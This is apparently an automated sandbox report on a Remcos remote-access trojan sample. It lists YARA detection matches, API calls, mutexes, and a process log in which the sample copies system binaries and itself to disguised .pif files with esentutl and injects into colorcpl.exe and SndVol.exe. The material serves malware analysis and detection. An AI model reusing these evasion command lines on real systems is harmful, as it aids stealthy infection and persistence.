Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/10@10/3

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	8_2_027D798D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	11_2_027D798D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	13_2_0281798D

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029C7FD4 GetDiskFreeSpaceA,

0_2_029C7FD4

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CF4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

8_2_027CF4AF

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D6DC8 CoCreateInstance,

0_2_029D6DC8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DB539 FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_027DB539

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_027DAADB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: D2pQ4J4GGZ.exe	ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe	Virustotal: Detection: 71%

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

File read: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\D2pQ4J4GGZ.exe "C:\Users\user\Desktop\D2pQ4J4GGZ.exe"
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
